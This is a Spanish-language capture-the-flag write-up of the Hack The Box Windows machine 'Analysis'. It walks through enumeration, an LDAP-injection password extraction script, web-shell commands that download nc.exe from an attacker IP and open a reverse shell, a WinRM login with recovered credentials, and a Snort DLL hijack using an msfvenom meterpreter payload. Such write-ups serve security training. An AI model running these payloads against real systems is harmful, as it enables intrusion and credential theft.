Analysis
OS: Windows
Dificultad: Difícil
Puntos: 40
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.96.0 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.96.0
Nmap scan report for 10.129.96.0
Host is up, received reset ttl 127 (0.074s latency).
Scanned at 2024-01-23 10:46:59 EST for 72s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-01-23 15:47:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3306/tcp open mysql syn-ack ttl 127 MySQL (unauthorized)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
33060/tcp open mysqlx? syn-ack ttl 127
| fingerprint-strings:
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Enumeration
Fuzzing vhost.
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.analysis.htb" -u http://analysis.htb/
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://analysis.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.analysis.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
internal [Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 73ms]
Fuzzing directories.
gobuster dir -u http://internal.analysis.htb/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://internal.analysis.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/dashboard (Status: 301) [Size: 174] [--> http://internal.analysis.htb/dashboard/]
/employees (Status: 301) [Size: 174] [--> http://internal.analysis.htb/employees/]
/users (Status: 301) [Size: 170] [--> http://internal.analysis.htb/users/]
gobuster dir -u http://internal.analysis.htb/employees -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,asp,aspx -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://internal.analysis.htb/employees
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,asp,aspx
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 1085]
/Login.php (Status: 200) [Size: 1085]
gobuster dir -u http://internal.analysis.htb/users -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,asp,aspx -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://internal.analysis.htb/users
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,asp,aspx
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/list.php (Status: 200) [Size: 17]
Accediendo a esa url nos muestra el siguiente mensaje.
curl -i http://internal.analysis.htb/users/list.php
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.2.5
Date: Tue, 23 Jan 2024 16:50:06 GMT
Content-Length: 17
missing parameter
Fuzzing parametros.
ffuf -w /usr/share/wordlists/dirb/big.txt -u "http://internal.analysis.htb/users/list.php?FUZZ=jdoe" -fw 2
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://internal.analysis.htb/users/list.php?FUZZ=jdoe
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 2
________________________________________________
name [Status: 200, Size: 406, Words: 11, Lines: 1, Duration: 82ms]
Enum users.
/opt/windows/kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d analysis.htb --dc 10.129.96.0
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/23/24 - Ronnie Flathers @ropnop
2024/01/23 11:06:21 > Using KDC(s):
2024/01/23 11:06:21 > 10.129.96.0:88
2024/01/23 11:07:12 > [+] VALID USERNAME: jdoe@analysis.htb
2024/01/23 11:07:55 > [+] VALID USERNAME: ajohnson@analysis.htb
2024/01/23 11:09:31 > [+] VALID USERNAME: cwilliams@analysis.htb
2024/01/23 11:10:14 > [+] VALID USERNAME: wsmith@analysis.htb
2024/01/23 11:12:38 > [+] VALID USERNAME: jangel@analysis.htb
2024/01/23 11:21:33 > [+] VALID USERNAME: technician@analysis.htb
LDAP Injection
Identificamos que la aplicacion es vulnerable a LDAP Injection.
http://internal.analysis.htb/users/list.php?name=*
Fuzzing atributos.
http://internal.analysis.htb/users/list.php?name=technician)(userPassword=*
Dentro de todos los atributos que encontramos el que puede llegar a tener informacion importanto es description.
import string
import requests
url = "http://internal.analysis.htb/users/list.php?name=technician)(description="
password = ""
while True:
for char in string.printable:
if char not in ['(',')']:
payload = password + char
response = requests.get(url + payload + "*")
if len(response.text) != 406:
print(payload)
password = payload
break
elif char == "*":
password = payload
break
Utilizando el script de arriba obtenemos el siguiente password.
technician@analysis.htb : 97NTtl*4QP96Bv
File Upload Revershell
Usando las credenciales obtenidas podemos autenticarnos en el portal de login.
http://internal.analysis.htb/employees/login.php
Podemos subir una web shell en la aplicacion.
http://internal.analysis.htb/dashboard/form.php
Utilizaremos los siguientes comandos para obtener reverse shell.
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=mkdir+c:\temp
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=curl+10.10.14.9/nc.exe+-o+c:\temp\nc.exe
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=c:\temp\nc.exe+10.10.14.9+1234+-e+cmd.exe
Lateral Movement
Utilizando winpeas encontramos el password del usuario jdoe.
Nos conectamos por medio de winrm.
evil-winrm -i 10.10.11.250 -u 'jdoe' -p '7y4Z4^*y9Zzj'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jdoe\Documents> type ..\Desktop\user.txt
2234595e802096e282d2f9e421e6d664
*Evil-WinRM* PS C:\Users\jdoe\Documents>
Privilege Escalation
Binario con posibilidad de DLL Hijacking.
Snort(Snort)[C:\Snort\bin\snort.exe /SERVICE] - Autoload - No quotes and Space detected
Possible DLL Hijacking in binary folder: C:\Snort\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])
Snort configuration.
type C:\snort\etc\snort.conf
DLL Hijacking
Create dll.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f dll -o sf_engine.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: sf_engine.dll
Configure metasploit.
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4444
run
Upload dll.
upload /root/htb/Box/Analysis/sf_engine.dll C:\snort\lib\snort_dynamicpreprocessor\sf_engine.dll
Info: Uploading /root/htb/Box/Analysis/shell.dll to C:\snort\lib\snort_dynamicpreprocessor\shell.dll
Data: 12288 bytes of 12288 bytes copied
Info: Upload successful!
Una vez configurado el metasploit esperamos un minuto a que nos regrese la shell.
References
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/README.md#defaults-attributes
https://hyp3rlinx.altervista.org/advisories/SNORT-DLL-HIJACK.txt